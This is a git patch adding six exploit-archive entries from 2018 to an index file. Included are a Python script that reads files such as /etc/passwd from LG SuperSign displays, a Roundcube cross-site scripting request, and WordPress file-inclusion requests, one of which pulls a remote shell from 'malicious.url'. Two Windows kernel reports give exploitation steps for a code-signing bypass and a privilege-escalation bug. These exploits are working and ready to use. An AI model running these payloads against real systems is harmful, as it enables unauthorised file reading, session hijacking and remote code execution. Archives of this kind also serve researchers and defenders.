From c7cec74ceb8f7356cd39f4eaf64ac347147048d4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 20 Sep 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-09-20 6 changes to exploits/shellcodes Microsoft Windows - 'CiSetFileCache' WDAC Security Feature Bypass TOCTOU Microsoft Windows - Double Dereference in NtEnumerateKey Elevation of Privilege Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion WordPress Plugin Localize My Post 1.0 - Local File Inclusion LG SuperSign EZ CMS 2.5 - Local File Inclusion --- exploits/hardware/webapps/45440.py | 30 ++++ exploits/linux/webapps/45437.txt | 31 ++++ exploits/php/webapps/45438.txt | 21 +++ exploits/php/webapps/45439.txt | 15 ++ exploits/windows/dos/45435.txt | 41 +++++ exploits/windows/dos/45436.txt | 262 +++++++++++++++++++++++++++++ files_exploits.csv | 6 + 7 files changed, 406 insertions(+) create mode 100755 exploits/hardware/webapps/45440.py create mode 100644 exploits/linux/webapps/45437.txt create mode 100644 exploits/php/webapps/45438.txt create mode 100644 exploits/php/webapps/45439.txt create mode 100644 exploits/windows/dos/45435.txt create mode 100644 exploits/windows/dos/45436.txt diff --git a/exploits/hardware/webapps/45440.py b/exploits/hardware/webapps/45440.py new file mode 100755 index 000000000..0e81b7e70 --- /dev/null +++ b/exploits/hardware/webapps/45440.py @@ -0,0 +1,30 @@ +# Exploit Title: LG SuperSign EZ CMS 2.5 - Local File Inclusion +# Date: 2018-09-13 +# Exploit Author: Alejandro Fanjul +# Vendor Homepage: https://www.lg.com/ar/software-lg-supersign +# Version: SuperSign EZ (CMS) +# Tested on: Web OS 4.0 +# CVE : CVE-2018-16288 + +# More info: http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html +# Any user can read files from the TV, without authentication due to an existing LFI in the following path: + +# http://SuperSign_IP:9080/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd + +# PoC + +import requests +import re +from argparse import ArgumentParser + +parser = ArgumentParser(description="SuperSign Reboot") +parser.add_argument("-t", "--target", dest="target", + help="Target") +parser.add_argument("-p", "--path", dest="filepath", + help="path to the file you want to read") + +args = parser.parse_args() +path = args.filepath + +s = requests.get('http://'+ str(args.target).replace('\n', '') +'/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'+str(path)) +print s.text \ No newline at end of file diff --git a/exploits/linux/webapps/45437.txt b/exploits/linux/webapps/45437.txt new file mode 100644 index 000000000..2248b0f44 --- /dev/null +++ b/exploits/linux/webapps/45437.txt @@ -0,0 +1,31 @@ +# Exploit Title: Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting +# Date: 2018-09-09 +# Exploit Author: Fahimeh Rezaei +# Vendor Homepage: https://plugins.roundcube.net/packages/eagle00789/rcfilters +# Software Link: https://plugins.roundcube.net/packages/eagle00789/rcfilters +# Version: rcfilters plugin v2.1.6 +# Tested on: Roundcube version 1.0.5 +# CVE : CVE-2018-16736 +# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16736 +# https://nvd.nist.gov/vuln/detail/CVE-2018-16736 +# https://github.com/eagle00789/RC_Filters/issues/19 + +# Details: +# In the rcfilters plugin 2.1.6 for Roundcube, XSS exists via the +# _whatfilter and _messages parameters (in the Filters section of the settings). + +# PoC + +POST /rc/?_task=settings&_action=plugin.filters-save HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 119 +Referer: https://Target/rc/?_action=plugin.filters&_task=settings +Cookie: roundcube_sessid=; roundcube_sessauth= +Connection: close +Upgrade-Insecure-Requests: 1 + +_token=09bcde247d252364ea55c217c7654a1f&_whatfilter=from]&_searchstring=whatever&_casesensitive=1&_folders=INBOX&_messages=all]) \ No newline at end of file diff --git a/exploits/php/webapps/45438.txt b/exploits/php/webapps/45438.txt new file mode 100644 index 000000000..261493c82 --- /dev/null +++ b/exploits/php/webapps/45438.txt @@ -0,0 +1,21 @@ +# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion +# Author: Manuel Garcia Cardenas +# Date: 2018-09-19 +# Software link: https://es.wordpress.org/plugins/wechat-broadcast/ +# CVE: N/A + +# Description +# This bug was found in the file: /wechat-broadcast/wechat/Image.php +# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : ''); +# The parameter "url" it is not sanitized allowing include local or remote files +# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol +# to interact with the application. + +# PoC +# The following URL have been confirmed that is vulnerable to local and remote file inclusion. + +GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd + +# Remote File Inclusion POC: + +GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt \ No newline at end of file diff --git a/exploits/php/webapps/45439.txt b/exploits/php/webapps/45439.txt new file mode 100644 index 000000000..c3f7bef04 --- /dev/null +++ b/exploits/php/webapps/45439.txt @@ -0,0 +1,15 @@ +# Exploit Title: WordPress Plugin Localize My Post 1.0 - Local File Inclusion +# Author: Manuel Garcia Cardenas +# Date: 2018-09-19 +# Software link: https://es.wordpress.org/plugins/localize-my-post/ +# CVE: N/A + +# DESCRIPTION +# This bug was found in the file: /localize-my-post/ajax/include.php +# include($_REQUEST['file']); +# The parameter "file" it is not sanitized allowing include local files +# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. + +# Local File Inclusion POC: + +GET /wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/exploits/windows/dos/45435.txt b/exploits/windows/dos/45435.txt new file mode 100644 index 000000000..0ea183584 --- /dev/null +++ b/exploits/windows/dos/45435.txt @@ -0,0 +1,41 @@ +Windows: CiSetFileCache TOCTOU CVE-2017-11830 Variant WDAC Security Feature Bypass +Platform: Windows 10 1803, 1709 (should include S-Mode but not tested) +Class: Security Feature Bypass + +Summary: +While the TOCTOU attack against cache signing has been mitigated through NtSetCachedSigningLevel it’s possible to reach the same code via NtCreateSection leading to circumventing WDAC policies and CIG/PPL. + +Description: +I'm reporting this as you've fixed the previous issues (cases 43036 and 40101) so I'm making an assumption you'd also fix this one. The previous issues allowed a unprivileged caller to exploit a race condition in the CiSetFileCache kernel function by calling NtSetCachedSigningLevel. These issues should now be fixed. During my research into PPL/PP bypasses I noticed that the cache will also be written during the initial creation of an image section, when the process is running with an increased section signing level. This is presumably to allow the kernel to cache the signature automatically. This is an issue because it’s possible to create an image section with a writable (and executable) handle to the file and no part of CI then checks whether the caller has write access. It’s possible to have an elevated section signing level by enabling the ProcessSignaturePolicy process mitigation policy, it’s not required to be in a PPL. In fact, while I’ve not tested it, it’s possible that just running inside a process on Windows 10 S-Mode would be sufficient as the section signing level should be elevated for WDAC. + +So to exploit this we can do the following: + +1. Elevated the section signing level of the current process using SetProcessMitigationPolicy or just running in a WDAC/CIG process. +2. Copy a valid signed file to a known name then open a writable and executable handle to that file. +3. Set an oplock on a known catalog file which will be checked +4. Call NtCreateSection with the handle requesting SEC_IMAGE. +5. Wait for oplock to fire, rewrite the file with an untrusted binary, then release oplock. +6. Close section and file handles. The cache should have been applied to the untrusted file. + +Perhaps CI should check whether the file handle has been opened for write access and not write out the cache in those cases as realistically creating an image section from a writable handle should be an unusual operation. The normal loader process opens the handle only for read/execute. + +Proof of Concept: + +I’ve provided a PoC as a C# project. It will allow you to “cache sign” an arbitrary executable. To test on S-Mode you’ll need to sign the PoC (and the NtApitDotNet.dll assembly) so it’ll run. It copies notepad to a file, attempts to verify it but uses an oplock to rewrite the contents of the file with the untrusted file before it can set the kernel EA. + +1) Compile the C# project. It will need to grab the NtApiDotNet v1.1.15 package from NuGet to work. +2) Execute the PoC passing the path to an unsigned file and to the output “cache signed” file, e.g. poc unsigned.exe output.exe. Make sure the output file is on a volume which supports cached signing level such as the main boot volume. +3) You should see it print the signing level, if successful. +4) You should now be able to execute the unsigned file, bypassing the security policy enforcement. + +NOTE: If it prints an exception then the exploit failed. The opened catalog files seemed to be cached for some unknown period of time after use so if the catalog file I’m using for a timing signal is already open then the oplock is never broken. Just rerun the poc which will pick a different catalog file to use. Also the output file must be on to a NTFS volume with the USN Change Journal enabled as that’s relied upon by the signature level cache code. Best to do it to the boot drive as that ensures everything should work correctly. + +Expected Result: +Access denied or at least an error setting the cached signing level. + +Observed Result: +The signing level cache is applied to the file with no further verification. You can now execute the file as if it was signed. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45435.zip \ No newline at end of file diff --git a/exploits/windows/dos/45436.txt b/exploits/windows/dos/45436.txt new file mode 100644 index 000000000..4923278e8 --- /dev/null +++ b/exploits/windows/dos/45436.txt @@ -0,0 +1,262 @@ +Windows: Double Dereference in NtEnumerateKey Elevation of Privilege +Platform: Windows 10 1803 (not vulnerable in earlier versions) +Class: Elevation of Privilege + +Summary: A number of registry system calls do not correctly handle pre-defined keys resulting in a double dereference which can lead to EoP. + +Description: + +The registry contains a couple of predefined keys, to generate performance information. These actually exist in the the machine hive under \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib. When these keys are opened the kernel returns a status code of STATUS_PREDEFINED_KEY, but it also returns a handle to the key. + +The kernel doesn’t allow these keys to be used for many operations such as enumeration of subkeys and values, so these system calls check before the key is used and returns STATUS_INVALID_HANDLE. The code for this in NtEnumerateKey looks like the following: + +status = ObReferenceObjectByHandle(Handle, KEY_ENUMERATE, CmKeyObjectType, &Object); +if ( status >= 0 && Object->Type != 'ky02' ) { + status = STATUS_INVALID_HANDLE; + ObfDereferenceObject(Object); <-- Dereference object, + } + if (status < 0) { + goto EXIT_LABEL; + } + +This code in itself is fine, but in 1803 at the exit label we find the following additional code: + +if (Object) + ObfDereferenceObject(Object); + +This results in the object being dereferenced twice. Due the way the object reference counting works this will not be noticed until the key handle is closed, which results in a REFERENCE_BY_POINTER bugcheck being generated. This might only be a local DoS if the issue was caught earlier, but because the caller can do other things with the corrupted object we can potentially turn this into a UaF and from there elevate privileges. For example the provided PoC passes the handle to NtDuplicateObject which results in the kernel modifying a free pool allocation. + +I’d recommend ensuring you check all similar functions such as NtEnumerateValueKey as there seems to be a common issue, perhaps it’s a macro or template which is generating the bad code. + +The following is an example dump from a crash, at the end the !pool command is used on the object address to demonstrate the memory allocation was freed before being modified. + +Use !analyze -v to get detailed debugging information. + +BugCheck 18, {0, ffff8e0db3a0f7a0, 2, ffffffffffffffff} + +Probably caused by : ntkrnlmp.exe ( nt!ObfDereferenceObjectWithTag+155dd9 ) + +Followup: MachineOwner +--------- + +0: kd> !analyze -v +******************************************************************************* +* * +* Bugcheck Analysis * +* * +******************************************************************************* + +REFERENCE_BY_POINTER (18) +Arguments: +Arg1: 0000000000000000, Object type of the object whose reference count is being lowered +Arg2: ffff8e0db3a0f7a0, Object whose reference count is being lowered +Arg3: 0000000000000002, Reserved +Arg4: ffffffffffffffff, Reserved + The reference count of an object is illegal for the current state of the object. + Each time a driver uses a pointer to an object the driver calls a kernel routine + to increment the reference count of the object. When the driver is done with the + pointer the driver calls another kernel routine to decrement the reference count. + Drivers must match calls to the increment and decrement routines. This bugcheck + can occur because an object's reference count goes to zero while there are still + open handles to the object, in which case the fourth parameter indicates the number + of opened handles. It may also occur when the object’s reference count drops below zero + whether or not there are open handles to the object, and in that case the fourth parameter + contains the actual value of the pointer references count. + +Debugging Details: +------------------ + + +DUMP_CLASS: 1 + +DUMP_QUALIFIER: 401 + +BUILD_VERSION_STRING: 17134.1.amd64fre.rs4_release.180410-1804 + +SYSTEM_MANUFACTURER: Microsoft Corporation + +VIRTUAL_MACHINE: HyperV + +SYSTEM_PRODUCT_NAME: Virtual Machine + +SYSTEM_SKU: None + +SYSTEM_VERSION: Hyper-V UEFI Release v3.0 + +BIOS_VENDOR: Microsoft Corporation + +BIOS_VERSION: Hyper-V UEFI Release v3.0 + +BIOS_DATE: 03/02/2018 + +BASEBOARD_MANUFACTURER: Microsoft Corporation + +BASEBOARD_PRODUCT: Virtual Machine + +BASEBOARD_VERSION: Hyper-V UEFI Release v3.0 + +DUMP_TYPE: 1 + +BUGCHECK_P1: 0 + +BUGCHECK_P2: ffff8e0db3a0f7a0 + +BUGCHECK_P3: 2 + +BUGCHECK_P4: ffffffffffffffff + +CPU_COUNT: 2 + +CPU_MHZ: a98 + +CPU_VENDOR: GenuineIntel + +CPU_FAMILY: 6 + +CPU_MODEL: 8e + +CPU_STEPPING: 9 + +CPU_MICROCODE: 6,8e,9,0 (F,M,S,R) SIG: FFFFFFFF'00000000 (cache) FFFFFFFF'00000000 (init) + +DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT + +BUGCHECK_STR: 0x18 + +PROCESS_NAME: PoC_NtEnumerateKey_EoP.exe + +CURRENT_IRQL: 0 + +ANALYSIS_SESSION_HOST: DESKTOP-JA4I3EF + +ANALYSIS_SESSION_TIME: 06-19-2018 13:36:38.0158 + +ANALYSIS_VERSION: 10.0.15063.468 amd64fre + +LAST_CONTROL_TRANSFER: from fffff80357473ab9 to fffff8035742c330 + +STACK_TEXT: +ffffb78e`5a91f678 fffff803`57473ab9 : 00000000`00000018 00000000`00000000 ffff8e0d`b3a0f7a0 00000000`00000002 : nt!KeBugCheckEx +ffffb78e`5a91f680 fffff803`57751b9b : 00000000`00000000 00000000`00000000 00020019`00000000 ffffb78e`5a91f7c0 : nt!ObfDereferenceObjectWithTag+0x155dd9 +ffffb78e`5a91f6c0 fffff803`5775157d : ffffe58b`763cf580 00000a50`00000040 ffffe58b`75c75f20 00000000`00000001 : nt!ObDuplicateObject+0x58b +ffffb78e`5a91f980 fffff803`5743c943 : ffffe58b`763c4700 00000000`008fe098 ffffb78e`5a91fa28 00000000`00000000 : nt!NtDuplicateObject+0x12d +ffffb78e`5a91fa10 00007ffa`f3cda634 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : nt!KiSystemServiceCopyEnd+0x13 +00000000`008fe078 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : 0x00007ffa`f3cda634 + + +STACK_COMMAND: kb + +THREAD_SHA1_HASH_MOD_FUNC: 4fc60443ee144421725d502d6e3b53056b889c26 + +THREAD_SHA1_HASH_MOD_FUNC_OFFSET: c219a3da6c3050112ed885b130b5ebbab9cdff96 + +THREAD_SHA1_HASH_MOD: f08ac56120cad14894587db086f77ce277bfae84 + +FOLLOWUP_IP: +nt!ObfDereferenceObjectWithTag+155dd9 +fffff803`57473ab9 cc int 3 + +FAULT_INSTR_CODE: 4e8d48cc + +SYMBOL_STACK_INDEX: 1 + +SYMBOL_NAME: nt!ObfDereferenceObjectWithTag+155dd9 + +FOLLOWUP_NAME: MachineOwner + +MODULE_NAME: nt + +IMAGE_NAME: ntkrnlmp.exe + +DEBUG_FLR_IMAGE_TIMESTAMP: 5b1a4590 + +BUCKET_ID_FUNC_OFFSET: 155dd9 + +FAILURE_BUCKET_ID: 0x18_OVER_DEREFERENCE_nt!ObfDereferenceObjectWithTag + +BUCKET_ID: 0x18_OVER_DEREFERENCE_nt!ObfDereferenceObjectWithTag + +PRIMARY_PROBLEM_CLASS: 0x18_OVER_DEREFERENCE_nt!ObfDereferenceObjectWithTag + +TARGET_TIME: 2018-06-19T20:33:20.000Z + +OSBUILD: 17134 + +OSSERVICEPACK: 0 + +SERVICEPACK_NUMBER: 0 + +OS_REVISION: 0 + +SUITE_MASK: 272 + +PRODUCT_TYPE: 1 + +OSPLATFORM_TYPE: x64 + +OSNAME: Windows 10 + +OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS + +OS_LOCALE: + +USER_LCID: 0 + +OSBUILD_TIMESTAMP: 2018-06-08 02:00:00 + +BUILDDATESTAMP_STR: 180410-1804 + +BUILDLAB_STR: rs4_release + +BUILDOSVER_STR: 10.0.17134.1.amd64fre.rs4_release.180410-1804 + +ANALYSIS_SESSION_ELAPSED_TIME: 13a4 + +ANALYSIS_SOURCE: KM + +FAILURE_ID_HASH_STRING: km:0x18_over_dereference_nt!obfdereferenceobjectwithtag + +FAILURE_ID_HASH: {4139309c-4e9f-52f0-ac5e-4041e7a86a20} + +Followup: MachineOwner +--------- + +0: kd> !pool ffff8e0db3a0f7a0 +Pool page ffff8e0db3a0f7a0 region is Paged pool + ffff8e0db3a0f000 size: 150 previous size: 0 (Free ) FMfn + ffff8e0db3a0f150 size: 130 previous size: 150 (Free) Free + ffff8e0db3a0f280 size: 40 previous size: 130 (Allocated) MPan + ffff8e0db3a0f2c0 size: 50 previous size: 40 (Free ) SeAt + ffff8e0db3a0f310 size: c0 previous size: 50 (Free ) Se + ffff8e0db3a0f3d0 size: 50 previous size: c0 (Free) Free + ffff8e0db3a0f420 size: 220 previous size: 50 (Allocated) FMfn + ffff8e0db3a0f640 size: a0 previous size: 220 (Allocated) Sect + ffff8e0db3a0f6e0 size: 50 previous size: a0 (Free) Free +*ffff8e0db3a0f730 size: 100 previous size: 50 (Free ) *Key + Pooltag Key : Key objects + ffff8e0db3a0f830 size: 10 previous size: 100 (Free) Free + ffff8e0db3a0f840 size: e0 previous size: 10 (Allocated) NtFs + ffff8e0db3a0f920 size: c0 previous size: e0 (Allocated) FIcs + ffff8e0db3a0f9e0 size: c0 previous size: c0 (Free ) SeTd + ffff8e0db3a0faa0 size: 560 previous size: c0 (Allocated) Ntff + + + + +Proof of Concept: + +I’ve provided a PoC as a C# project. This only demonstrates the issue and proves that it would be possible to force this issue into a UaF even with the mitigations on reference counting. + +1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work. +2) Run the PoC on an machine with Windows 10 1803, I’ve only tested x64. +3) The OS should crash, inspect it in a kernel debugger or from the crash dump. + +Expected Result: +The OS ignores the pre-defined key as expected. + +Observed Result: +The object’s reference count is corrupted. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45436.zip \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 576c232d4..edd91bcb6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6118,6 +6118,8 @@ id,file,description,date,author,type,platform,port 45424,exploits/hardware/dos/45424.py,"Netis ADSL Router DL4322D RTK 2.1.1 - Denial of Service (PoC)",2018-09-17,cakes,dos,hardware,21 45431,exploits/windows/dos/45431.js,"Microsoft Edge Chakra - 'PathTypeHandlerBase::SetAttributesHelper' Type Confusion",2018-09-18,"Google Security Research",dos,windows, 45432,exploits/windows/dos/45432.js,"Microsoft Edge Chakra JIT - 'localeCompare' Type Confusion",2018-09-18,"Google Security Research",dos,windows, +45435,exploits/windows/dos/45435.txt,"Microsoft Windows - 'CiSetFileCache' WDAC Security Feature Bypass TOCTOU",2018-09-19,"Google Security Research",dos,windows, +45436,exploits/windows/dos/45436.txt,"Microsoft Windows - Double Dereference in NtEnumerateKey Elevation of Privilege",2018-09-19,"Google Security Research",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -39980,3 +39982,7 @@ id,file,description,date,author,type,platform,port 45422,exploits/hardware/webapps/45422.txt,"Netis ADSL Router DL4322D RTK 2.1.1 - Cross-Site Scripting",2018-09-17,cakes,webapps,hardware,80 45423,exploits/php/webapps/45423.txt,"Joomla Component JCK Editor 6.4.4 - 'parent' SQL Injection",2018-09-17,"Hamza Megahed",webapps,php, 45434,exploits/php/webapps/45434.txt,"WordPress Plugin Arigato Autoresponder and Newsletter 2.5 - Blind SQL Injection / Reflected Cross-Site Scripting",2018-09-18,"Larry W. Cashdollar",webapps,php,80 +45437,exploits/linux/webapps/45437.txt,"Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting",2018-09-19,"Fahimeh Rezaei",webapps,linux,443 +45438,exploits/php/webapps/45438.txt,"WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion",2018-09-19,"Manuel García Cárdenas",webapps,php,80 +45439,exploits/php/webapps/45439.txt,"WordPress Plugin Localize My Post 1.0 - Local File Inclusion",2018-09-19,"Manuel García Cárdenas",webapps,php,80 +45440,exploits/hardware/webapps/45440.py,"LG SuperSign EZ CMS 2.5 - Local File Inclusion",2018-09-19,"Alejandro Fanjul",webapps,hardware,9080